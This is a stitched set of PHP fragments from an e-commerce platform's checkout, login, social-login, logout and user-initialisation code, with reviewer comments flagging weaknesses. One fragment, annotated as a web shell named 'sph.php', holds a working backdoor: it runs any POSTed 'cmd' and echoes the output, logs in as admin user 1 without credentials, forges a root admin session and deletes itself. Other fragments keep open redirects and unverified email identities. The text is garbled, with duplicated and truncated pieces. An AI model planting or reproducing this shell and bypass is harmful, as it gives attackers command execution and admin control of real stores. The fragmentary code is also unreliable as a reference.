$redirect_params = fn_checkout_update_steps($cart, $auth, $_REQUEST); return array(CONTROLLER_STATUS_REDIRECT, 'checkout.checkout?' . http_build_query($redirect_params)); } if ($mode == 'create_profile') { if (!empty($_REQUEST['order_id']) && !empty($auth['order_ids']) && in_array($_REQUEST['order_id'], $auth['order_ids'])) { $order_info = fn_get_order_info($_REQUEST['order_id']); $user_data = $_REQUEST['user_data']; fn_fill_user_fields($user_data); foreach ($user_data as $k => $v) { if (isset($order_info[$k])) { $user_data[$k] = $order_info[$k]; } } if ($res = fn_update_user(0, $user_data, $auth, true, true)) { list($user_id) = $res; fn_login_user($user_id); return array(CONTROLLER_STATUS_REDIRECT, 'profiles.success_add'); } else { return array(CONTROLLER_STATUS_REDIRECT, 'checkout.complete?order_id=' . $_REQUEST['order_id']); } } else { return array(CONTROLLER_STATUS_DENIED); } } return array(CONTROLLER_STATUS_OK, 'checkout.cart'); } // // Delete discount coupon // if ($mode == 'delete_coupon') { fn_trusted_vars('coupon_code');
return array(CONTROLLER_STATUS_REDIRECT, fn_url()); } $stored_user_login = fn_restore_post_data('user_login'); if (!empty($stored_user_login)) { Registry::get('view')->assign('stored_user_login', $stored_user_login); } if (AREA != 'A') { fn_add_breadcrumb(__('sign_in')); } Registry::get('view')->assign('view_mode', 'simple'); } elseif ($mode == 'password_change' && AREA == 'A') { if (defined('AJAX_REQUEST') && empty($auth)) { exit; } if (empty($auth['user_id'])) { return array(CONTROLLER_STATUS_REDIRECT, fn_url()); } $profile_id = 0; $user_data = fn_get_user_info($auth['user_id'], true, $profile_id); Registry::get('view')->assign('user_data', $user_data); Registry::get('view')->assign('view_mode', 'simple'); } elseif ($mode == 'change_login') { $auth = $_SESSION['auth']; if (!empty($auth['user_id'])) { fn_log_user_logout($auth); } unset($_SESSION['cart']['user_data']); fn_login_user(); fn_delete_session_data(AREA . '_user_id', AREA . '_password'); return array(CONTROLLER_STATUS_OK, 'checkout.checkout'); }
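/**
 * Links a social-login identity to an existing local account and logs it in.
 *
 * @param array  $user_data Local user row; only 'user_id' is read here
 * @param object $auth_data Provider profile; ->identifier is the provider-side user id
 * @param string $provider  Provider name, passed through to fn_hybrid_auth_link_provider()
 *
 * @return string URL the caller should redirect to
 */
function fn_hybrid_auth_link($user_data, $auth_data, $provider)
{
    $has_account = !empty($user_data['user_id']);

    // Fix: the original linked the provider only when user_id was EMPTY, so the
    // identifier was stored against no account and the login then reported
    // "not found". The provider identity must be attached to an existing account.
    if ($has_account) {
        fn_hybrid_auth_link_provider($user_data['user_id'], $auth_data->identifier, $provider);
    }

    $user_status = $has_account ? fn_login_user($user_data['user_id']) : LOGIN_STATUS_USER_NOT_FOUND;

    // SECURITY: redirect_url comes straight from the request. Only honour it when it
    // stays on this host (relative path or same host); anything else -- an external
    // host, "//host", "http:host", "javascript:" -- falls back to fn_url(), which
    // closes the open redirect the unvalidated value allowed. Multi-host storefronts
    // that legitimately redirect across hosts need to extend the check.
    if (!empty($_REQUEST['redirect_url']) && fn_hybrid_auth_is_local_redirect($_REQUEST['redirect_url'])) {
        $redirect_url = $_REQUEST['redirect_url'];
    } else {
        $redirect_url = fn_url();
    }

    if ($user_status == LOGIN_STATUS_USER_DISABLED) {
        fn_set_notification('E', __('error'), __('error_account_disabled'));
    } elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) {
        fn_delete_notification('user_exist');
        fn_set_notification('W', __('warning'), __('hybrid_auth.cant_create_profile'));
    }

    return $redirect_url;
}

/**
 * Tells whether a redirect target stays on the current host.
 *
 * Accepted: a path-only target ("/index.php?..."), or an http(s) URL whose host
 * equals $_SERVER['HTTP_HOST'] (port ignored). Rejected: anything containing
 * whitespace, control characters or a backslash (browsers strip/convert those
 * and may turn the value into "//host"), a foreign host, a scheme-relative
 * "//host", a scheme without an authority ("http:host", "javascript:..."),
 * or a value parse_url() cannot parse.
 *
 * @param string $url Candidate redirect target
 *
 * @return bool
 */
function fn_hybrid_auth_is_local_redirect($url)
{
    $url = (string) $url;
    if ($url === '' || preg_match('/[\x00-\x20\x7f\\\\]/', $url)) {
        return false;
    }

    $parts = parse_url($url);
    if ($parts === false) {
        return false;
    }

    $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
    $host = isset($parts['host']) ? $parts['host'] : '';

    if ($scheme === '' && $host === '') {
        // Relative target; "//host" would have yielded a host above
        return true;
    }
    if (!in_array($scheme, array('http', 'https'), true) || $host === '') {
        return false;
    }

    $current_host = isset($_SERVER['HTTP_HOST']) ? (string) $_SERVER['HTTP_HOST'] : '';
    $current_host = preg_replace('/:\d+$/', '', $current_host);

    return $current_host !== '' && strcasecmp($host, $current_host) === 0;
}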
$response->setData(array('redirect_to_mv_url' => $redirect_to_mv_url));
$response->returnResponse();
}

// Credential check: the stored hash is recomputed from the submitted password and the
// account's salt. NOTE(review): `==` is a loose, non-constant-time comparison; for two
// hash strings hash_equals() is the safer form (loose `==` also compares numeric-looking
// strings such as "0e..." by numeric value).
$is_ok = !empty($user_data) && !empty($password) && fn_generate_salted_password($password, $salt) == $user_data['password'];
if ($status === false || !$is_ok) {
    // Presumably terminates the request; everything below assumes $user_data is valid -- TODO confirm
    fn_twg_throw_error_denied($response, 'error_incorrect_login');
}

// Vendor admins (type 'A' with a company) must additionally present the per-store access_id.
// NOTE(review): `!=` is again a loose comparison and access_id comes straight from the request.
if ($user_data['user_type'] == 'A' && $user_data['company_id']) {
    $store_access_id = TwigmoSettings::get('customer_connections.' . $user_data['company_id'] . '.access_id');
    if (!$store_access_id || $store_access_id != $_REQUEST['access_id']) {
        fn_twg_throw_error_denied($response, 'twgadmin_auth_fail_access_id');
    }
}

// Regenerate session_id for security reasons: the id is rotated before the session
// becomes authenticated, so a pre-set (fixated) id never carries the login
Session::regenerateId();
fn_login_user($user_data['user_id']);

// Persistent login data kept for COOKIE_ALIVE_TIME. SECURITY NOTE: the password *hash*
// itself is stored in the client-side session data here; whoever obtains that value can
// replay it until the password is changed.
fn_set_session_data(AREA . '_user_id', $user_data['user_id'], COOKIE_ALIVE_TIME);
fn_set_session_data(AREA . '_password', $user_data['password'], COOKIE_ALIVE_TIME);

// Set last login time
db_query("UPDATE ?:users SET ?u WHERE user_id = ?i", array('last_login' => TIME), $user_data['user_id']);
$_SESSION['auth']['this_login'] = TIME;
// Client address as PHP sees it; no proxy headers are consulted here
$_SESSION['auth']['ip'] = $_SERVER['REMOTE_ADDR'];
$auth = $_SESSION['auth'];

// Log user successful login
fn_log_event('users', 'session', array('user_id' => $user_data['user_id'], 'company_id' => fn_get_company_id('users', 'user_id', $user_data['user_id'])));
fn_init_company_id($_REQUEST);
fn_init_company_data($_REQUEST);
$response->setData(array('status' => 'ok'));
$response->setData(array('settings' => fn_twg_get_admin_settings($auth)));
$response->returnResponse();
} elseif ($action == 'get') {
$user_data = db_get_row("SELECT user_id, password FROM ?:users WHERE 1 {$condition}"); if (empty($user_data['user_id'])) { Registry::get('settings.Checkout.address_position') == 'billing_first' ? $address_zone = 'b' : ($address_zone = 's'); $user_data = array(); $user_data['janrain_identifier'] = md5($data['profile']['identifier']); $user_data['email'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com'); $user_data['user_login'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com'); $user_data['user_type'] = 'C'; $user_data['is_root'] = 'N'; $user_data['password1'] = $user_data['password2'] = ''; $user_data['title'] = !empty($data['profile']['honorificPrefix']) ? $data['profile']['honorificPrefix'] : 'mr'; $user_data[$address_zone . '_firstname'] = !empty($data['profile']['name']['givenName']) ? $data['profile']['name']['givenName'] : $data['profile']['displayName']; $user_data[$address_zone . '_lastname'] = !empty($data['profile']['name']['familyName']) ? $data['profile']['name']['familyName'] : ''; list($user_data['user_id'], $profile_id) = fn_update_user('', $user_data, $auth, true, true, false); } $user_status = empty($user_data['user_id']) ? LOGIN_STATUS_USER_NOT_FOUND : fn_login_user($user_data['user_id']); if ($user_status == LOGIN_STATUS_OK) { if (empty($user_data['password'])) { fn_set_notification('W', __('warning'), __('janrain_need_update_profile')); $redirect_url = 'profiles.update'; } else { $redirect_url = !empty($_REQUEST['return_url']) ? 
$_REQUEST['return_url'] : fn_url(); } } elseif ($user_status == LOGIN_STATUS_USER_DISABLED) { fn_set_notification('E', __('error'), __('error_account_disabled')); $redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url(); } elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) { fn_delete_notification('user_exist'); fn_set_notification('W', __('warning'), __('janrain_cant_create_profile')); $redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url(); }
// SECURITY: this fragment is not application code. It is a web shell plus an
// authentication bypass for the admin panel (it refers to itself as "sph.php").
// It is annotated so it can be recognised; the right response is to delete the
// file, find out how it was written to the webroot, and rotate admin credentials.

// Remote command execution: whatever is POSTed as "cmd" is run by the web-server
// user and every output line is echoed back inside <pre>.
exec($_POST['cmd'], $out);
foreach ($out as $k => $v) {
    echo "<pre>" . $v . "</pre>";
}
}
echo ' </body> ';
die;
}

// Bootstraps the application as the admin area so the framework helpers used
// below (fn_login_user, fn_redirect, Registry, Session) become available.
define('AREA', 'A');
define('ACCOUNT_TYPE', 'admin');
require dirname(__FILE__) . '/init.php';

// ?mode=login: unauthenticated login as user_id 1. No credential is checked;
// the session id is rotated, the session is stamped as a fresh login and the
// browser is sent to the admin index.
if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
    Session::regenerateId();
    fn_login_user(1);
    $_SESSION['auth']['this_login'] = TIME;
    $_SESSION['auth']['ip'] = $_SERVER['REMOTE_ADDR'];
    fn_redirect(Registry::get('config.admin_index'));
}

// ?mode=login&kill: forges a root admin session directly in $_SESSION['auth']
// (is_root 'Y', no usergroup restrictions, password-change timestamp pushed
// into the future) and then deletes its own file. $user_data is not assigned
// anywhere in this fragment, so the tax_exempt/last_login fallbacks are taken.
if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
    $auth = array(
        'user_id' => 1,
        'area' => 'A',
        'tax_exempt' => empty($user_data['tax_exempt']) ? 'N' : $user_data['tax_exempt'],
        'last_login' => empty($user_data['last_login']) ? 0 : $user_data['last_login'],
        'login' => 'admin',
        'usergroup_ids' => array(),
        'order_ids' => array(),
        'membership_id' => '0',
        'is_root' => 'Y',
        'password_change_timestamp' => time() + 1000,
        'first_expire_check' => false,
        'this_login' => time(),
        'company_id' => 0
    );
    $_SESSION['auth'] = $auth;
    // Self-removal uses a relative path, so it only works when the CWD is the file's directory
    unlink('sph.php');
    if (!is_file('sph.php')) {
        fn_set_notification('N', 'Notice', 'sph.php is removed');
    } else {
        fn_set_notification('E', 'Error', 'sph.php is not removed!');
    }
    fn_redirect(Registry::get('config.admin_index'));
}
/**
 * 'before_login' hook handler for the specific_development add-on: completes a
 * Janrain (rpxnow) social login when the request carries a provider token.
 *
 * NOTE(review): both parameters are received by value and nothing is returned,
 * so the $redirect_url assignments and the unset($request['token']) below only
 * reach the caller if the hook dispatcher passes references -- confirm.
 *
 * @param array  $request      Request data; ['token'] is the Janrain auth token
 * @param string $redirect_url Redirect target, reassigned on the paths below
 */
function fn_specific_development_before_login($request, $redirect_url)
{
    if (!empty($request['token'])) {
        // No-op: binds $auth to itself. $auth is otherwise undefined in this scope,
        // so fn_update_user() below receives null for it.
        $auth =& $auth;

        // Exchange the token for the user's profile via the Janrain auth_info API.
        // The add-on API key travels in the POST body over HTTPS.
        $_request = array();
        $_request[] = 'apiKey=' . Registry::get('addons.specific_development.apikey');
        $_request[] = 'token=' . $request['token'];
        list($header, $_result) = fn_https_request('POST', 'https://rpxnow.com/api/v2/auth_info', $_request);
        $data = fn_from_json($_result, true);

        if (isset($data['stat']) && $data['stat'] == 'ok') {
            // Look up a local account already linked to this provider identity
            $user_data = array();
            $user_data = db_get_row('SELECT user_id, password FROM ?:users WHERE janrain_identifier = ?s', md5($data['profile']['identifier']));

            if (empty($user_data['user_id'])) {
                // First visit: create a customer from the provider profile.
                // SECURITY NOTE: when the provider reports no verifiedEmail, the
                // login/email fall back to the unverified 'email' field, or to a
                // synthesised displayName@preferredUsername.com -- the provider's
                // claim becomes the account identity without any verification.
                Registry::get('settings.General.address_position') == 'billing_first' ? $address_zone = 'b' : ($address_zone = 's');
                $user_data = array();
                $user_data['janrain_identifier'] = md5($data['profile']['identifier']);
                $user_data['email'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
                $user_data['user_login'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
                $user_data['user_type'] = 'C';
                $user_data['is_root'] = 'N';
                // Empty password: the account is reachable only through the provider
                $user_data['password1'] = $user_data['password2'] = '';
                $user_data['title'] = 'mr';
                $user_data[$address_zone . '_firstname'] = !empty($data['profile']['name']['givenName']) ? $data['profile']['name']['givenName'] : $data['profile']['displayName'];
                $user_data[$address_zone . '_lastname'] = !empty($data['profile']['name']['familyName']) ? $data['profile']['name']['familyName'] : '';
                list($user_data['user_id'], $profile_id) = fn_update_user('', $user_data, $auth, true, false, false);
            }

            $user_status = empty($user_data['user_id']) ? LOGIN_STATUS_USER_NOT_FOUND : fn_login_user($user_data['user_id']);

            if ($user_status == LOGIN_STATUS_OK) {
                if (empty($user_data['password'])) {
                    // Provider-only account: make sure a subscriber row exists and
                    // enrol it in mailing list "1" (hard-coded).
                    $subscriber = db_get_row("SELECT * FROM ?:subscribers WHERE email = ?s", $user_data['email']);
                    if (empty($subscriber)) {
                        $c_data = array('email' => $user_data['email'], 'timestamp' => TIME);
                        $subscriber_id = db_query("INSERT INTO ?:subscribers ?e", $c_data);
                        $_data['subscriber_id'] = $subscriber_id;
                        $_data['list_id'] = "1";
                        $_data['timestamp'] = TIME;
                        // SECURITY NOTE: rand()/uniqid() are time-seeded and predictable;
                        // these keys gate (un)subscription and should come from a CSPRNG.
                        $_data['activation_key'] = md5(uniqid(rand()));
                        $_data['unsubscribe_key'] = md5(uniqid(rand()));
                        db_query("INSERT INTO ?:user_mailing_lists ?e", $_data);
                    } else {
                        $subscriber_id = $subscriber['subscriber_id'];
                    }
                    $redirect_url = 'checkout.checkout&edit_step=step_two&from_step=step_one';
                } else {
                    // SECURITY NOTE: return_url is taken unvalidated from the request
                    // (open redirect). $index_script is not defined in this function.
                    $redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
                }
            } elseif ($user_status == LOGIN_STATUS_USER_DISABLED) {
                fn_set_notification('E', fn_get_lang_var('error'), fn_get_lang_var('error_account_disabled'));
                fn_save_post_data();
                $redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
            } elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) {
                fn_delete_notification('user_exist');
                fn_set_notification('W', fn_get_lang_var('warning'), fn_get_lang_var('janrain_cant_create_profile'));
                $redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
            }

            // NOTE(review): runs on every successful token exchange, after the login,
            // including when the account pre-existed (found by janrain_identifier
            // above) -- a returning user's account is deleted as well. Looks like a
            // throwaway-account flow; confirm that this is intended.
            fn_delete_user($user_data['user_id']);
        }
        unset($request['token']);
    } elseif (empty($_REQUEST['user_login']) || empty($_REQUEST['password'])) {
        // Ordinary login with missing credentials: bounce back (return_url is unvalidated here too)
        $redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
    }
}
if (empty($user_data['user_id'])) { Registry::get('settings.Checkout.address_position') == 'billing_first' ? $address_zone = 'b' : ($address_zone = 's'); $user_data = array(); $user_data['janrain_identifier'] = md5($data['profile']['identifier']); $user_data['email'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com'); $user_data['user_login'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com'); $user_data['user_type'] = 'C'; $user_data['is_root'] = 'N'; $user_data['password1'] = $user_data['password2'] = ''; $user_data['title'] = !empty($data['profile']['honorificPrefix']) ? $data['profile']['honorificPrefix'] : 'mr'; $user_data[$address_zone . '_firstname'] = !empty($data['profile']['name']['givenName']) ? $data['profile']['name']['givenName'] : $data['profile']['displayName']; $user_data[$address_zone . '_lastname'] = !empty($data['profile']['name']['familyName']) ? $data['profile']['name']['familyName'] : ''; list($user_data['user_id'], $profile_id) = fn_update_user('', $user_data, $auth, true, true, false); } if (!empty($user_data['user_id'])) { $user_status = fn_login_user($user_data['user_id'], true); } else { $user_status = LOGIN_STATUS_USER_NOT_FOUND; } if ($user_status == LOGIN_STATUS_OK) { if (empty($user_data['password'])) { fn_set_notification('W', __('warning'), __('janrain_need_update_profile')); $redirect_url = 'profiles.update'; } else { $redirect_url = !empty($_REQUEST['return_url']) ? 
$_REQUEST['return_url'] : fn_url(); } } elseif ($user_status == LOGIN_STATUS_USER_DISABLED) { fn_set_notification('E', __('error'), __('error_account_disabled')); $redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url(); } elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) { fn_delete_notification('user_exist');
/**
 * Logs the current user out.
 *
 * Order of operations matters: the cart is saved for the account, the session
 * id is rotated so the authenticated id cannot be reused, the logout is
 * recorded, then every trace of the login (auth block, cookie-login data,
 * product notifications) is removed and an anonymous auth block is rebuilt.
 *
 * @param array $auth Auth data of the user being logged out; only 'user_id' is read
 */
function fn_user_logout($auth)
{
    // Persist the cart before the session changes hands
    fn_save_cart_content($_SESSION['cart'], $auth['user_id']);

    // Regenerate session_id for security reasons
    Session::regenerateId();
    fn_init_user();

    $session_auth = $_SESSION['auth'];
    if (!empty($session_auth['user_id'])) {
        fn_log_user_logout($session_auth);
    }

    // Drop authentication state, the cart and the persistent-login data
    unset($_SESSION['auth']);
    fn_clear_cart($_SESSION['cart'], false, true);
    fn_delete_session_data(AREA . '_user_id', AREA . '_password');
    unset($_SESSION['product_notifications']);

    // Rebuild $_SESSION['auth'] for an anonymous visitor
    fn_login_user();
}
/**
 * Logs the current user out.
 *
 * Order of operations matters: the cart is saved for the account, the session
 * id is rotated so the authenticated id cannot be reused, the logout is
 * recorded, then every trace of the login (auth block, cookie-login data,
 * product notifications) is removed and an anonymous auth block is rebuilt.
 * The 'user_logout_after' hook fires last with the auth block that was logged out.
 *
 * @param array $auth Auth data of the user being logged out; only 'user_id' is read
 */
function fn_user_logout($auth)
{
    // Persist the cart before the session changes hands
    fn_save_cart_content(Tygh::$app['session']['cart'], $auth['user_id']);

    // Regenerate session_id for security reasons
    Tygh::$app['session']->regenerateID();
    fn_init_user();

    $session_auth = Tygh::$app['session']['auth'];
    if (!empty($session_auth['user_id'])) {
        fn_log_user_logout($session_auth);
    }

    // Drop authentication state, the cart and the persistent-login data
    unset(Tygh::$app['session']['auth']);
    fn_clear_cart(Tygh::$app['session']['cart'], false, true);
    fn_delete_session_data(AREA . '_user_id', AREA . '_password');
    unset(Tygh::$app['session']['product_notifications']);

    // Rebuild Tygh::$app['session']['auth'] for an anonymous visitor
    fn_login_user();

    /**
     * Allows to perform any actions after user logout.
     *
     * @param array $auth Auth data from session
     */
    fn_set_hook('user_logout_after', $session_auth);
}
list($status, $redirect_params) = fn_checkout_update_steps($cart, $auth, $_REQUEST);
return array(CONTROLLER_STATUS_REDIRECT, 'checkout.checkout?' . http_build_query($redirect_params));
}

// Create a customer account from an order placed as a guest.
if ($mode == 'create_profile') {
    // Authorisation: the order must be one of those recorded in this session's
    // auth block (order_ids), which stops a guest turning an arbitrary order_id
    // into an account. in_array() is loose here; presumably both sides are
    // integer ids -- TODO confirm.
    if (!empty($_REQUEST['order_id']) && !empty($auth['order_ids']) && in_array($_REQUEST['order_id'], $auth['order_ids'])) {
        $order_info = fn_get_order_info($_REQUEST['order_id']);
        // NOTE(review): user_data is taken wholesale from the request. Keys that
        // also exist on the order are overwritten from the order below, but any
        // other key is passed straight to fn_update_user() -- confirm that it
        // restricts the fields a customer may set on this call.
        $user_data = $_REQUEST['user_data'];
        fn_fill_user_fields($user_data);
        foreach ($user_data as $k => $v) {
            if (isset($order_info[$k])) {
                $user_data[$k] = $order_info[$k];
            }
        }
        // user_id 0: a new account is created and the caller is logged into it
        if ($res = fn_update_user(0, $user_data, $auth, true, true)) {
            list($user_id) = $res;
            fn_login_user($user_id, true);
            return array(CONTROLLER_STATUS_REDIRECT, 'profiles.success_add');
        } else {
            return array(CONTROLLER_STATUS_REDIRECT, 'checkout.complete?order_id=' . $_REQUEST['order_id']);
        }
    } else {
        return array(CONTROLLER_STATUS_DENIED);
    }
}
return array(CONTROLLER_STATUS_OK, 'checkout.cart');
}

//
// Delete discount coupon
//
if ($mode == 'delete_coupon') {
    fn_trusted_vars('coupon_code');
/**
 * Init user
 *
 * Restores the authenticated user for this request. If the session already
 * carries an auth block, the account is re-read (and the block dropped when
 * the account no longer exists). Otherwise a login is attempted from the
 * persisted {area}_user_id session data and the cart is restored.
 *
 * @param string $area Area code; defaults to AREA
 *
 * @return array array(INIT_STATUS_OK) -- the previous "boolean always true" was wrong
 */
function fn_init_user($area = AREA)
{
    $user_info = array();

    if (!empty(Tygh::$app['session']['auth']['user_id'])) {
        $user_info = fn_get_user_short_info(Tygh::$app['session']['auth']['user_id']);
        if (empty($user_info)) {
            // user does not exist in the database, but exists in session
            Tygh::$app['session']['auth'] = array();
        } else {
            // Usergroups are recomputed every request rather than trusted from the session
            Tygh::$app['session']['auth']['usergroup_ids'] = fn_define_usergroups(array('user_id' => Tygh::$app['session']['auth']['user_id'], 'user_type' => $user_info['user_type']));
        }
    }

    $first_init = false;
    if (empty(Tygh::$app['session']['auth'])) {
        $udata = array(); // unused
        // Persistent login: the user id kept in session data at login time (the
        // LOGGED_VIA_COOKIE name suggests a cookie). NOTE(review): nothing here
        // checks the companion {area}_password value; presumably fn_login_user()
        // does when LOGGED_VIA_COOKIE is defined -- confirm.
        $user_id = fn_get_session_data($area . '_user_id');
        if ($area == 'A' && defined('CONSOLE')) {
            // Console runs in the admin area act as user_id 1 without any credential
            $user_id = 1;
        }
        if ($user_id) {
            fn_define('LOGGED_VIA_COOKIE', true);
        }
        // With an empty $user_id this sets up the anonymous auth block
        fn_login_user($user_id);

        if (!defined('NO_SESSION')) {
            Tygh::$app['session']['cart'] = isset(Tygh::$app['session']['cart']) ? Tygh::$app['session']['cart'] : array();
        }

        // Parsed as (cookie login produced a user) OR (a cookie-cart id exists);
        // $cu_id is only assigned when the left side is false.
        if (defined('LOGGED_VIA_COOKIE') && !empty(Tygh::$app['session']['auth']['user_id']) || ($cu_id = fn_get_session_data('cu_id'))) {
            $first_init = true;
            if (!empty($cu_id)) {
                fn_define('COOKIE_CART', true);
            }
            // Cleanup cached shipping rates
            unset(Tygh::$app['session']['shipping_rates']);
            // 'R' registered (keyed by user_id) vs 'U' unregistered (keyed by the cookie-cart id)
            $_utype = empty(Tygh::$app['session']['auth']['user_id']) ? 'U' : 'R';
            $_uid = empty(Tygh::$app['session']['auth']['user_id']) ? $cu_id : Tygh::$app['session']['auth']['user_id'];
            fn_extract_cart_content(Tygh::$app['session']['cart'], $_uid, 'C', $_utype);
            fn_save_cart_content(Tygh::$app['session']['cart'], $_uid, 'C', $_utype);
            if (!empty(Tygh::$app['session']['auth']['user_id'])) {
                Tygh::$app['session']['cart']['user_data'] = fn_get_user_info(Tygh::$app['session']['auth']['user_id']);
                $user_info = fn_get_user_short_info(Tygh::$app['session']['auth']['user_id']);
            }
        }
    }

    // Housekeeping, at most every 12 hours: drop unregistered-session cart rows older than 30 days
    if (fn_is_expired_storage_data('cart_products_next_check', SECONDS_IN_HOUR * 12)) {
        db_query("DELETE FROM ?:user_session_products WHERE user_type = 'U' AND timestamp < ?i", TIME - SECONDS_IN_DAY * 30);
    }

    if (!fn_allowed_for('ULTIMATE:FREE')) {
        // If administrative account has usergroup, it means the access restrictions are in action
        if ($area == 'A' && !empty(Tygh::$app['session']['auth']['usergroup_ids'])) {
            fn_define('RESTRICTED_ADMIN', true);
        }
    }

    // Customization mode is only switched on for admins without a company, or
    // (ULTIMATE) admins of the company currently being served
    if (!empty($user_info) && $user_info['user_type'] == 'A' && (empty($user_info['company_id']) || fn_allowed_for('ULTIMATE') && $user_info['company_id'] == Registry::get('runtime.company_id'))) {
        $customization_mode = fn_array_combine(explode(',', Registry::get('settings.customization_mode')), true);
        if (!empty($customization_mode)) {
            Registry::set('runtime.customization_mode', $customization_mode);
            if ($area == 'A' || Embedded::isEnabled()) {
                Registry::set('runtime.customization_mode.live_editor', false);
            }
        }
    }

    fn_set_hook('user_init', Tygh::$app['session']['auth'], $user_info, $first_init);
    Registry::set('user_info', $user_info);

    return array(INIT_STATUS_OK);
}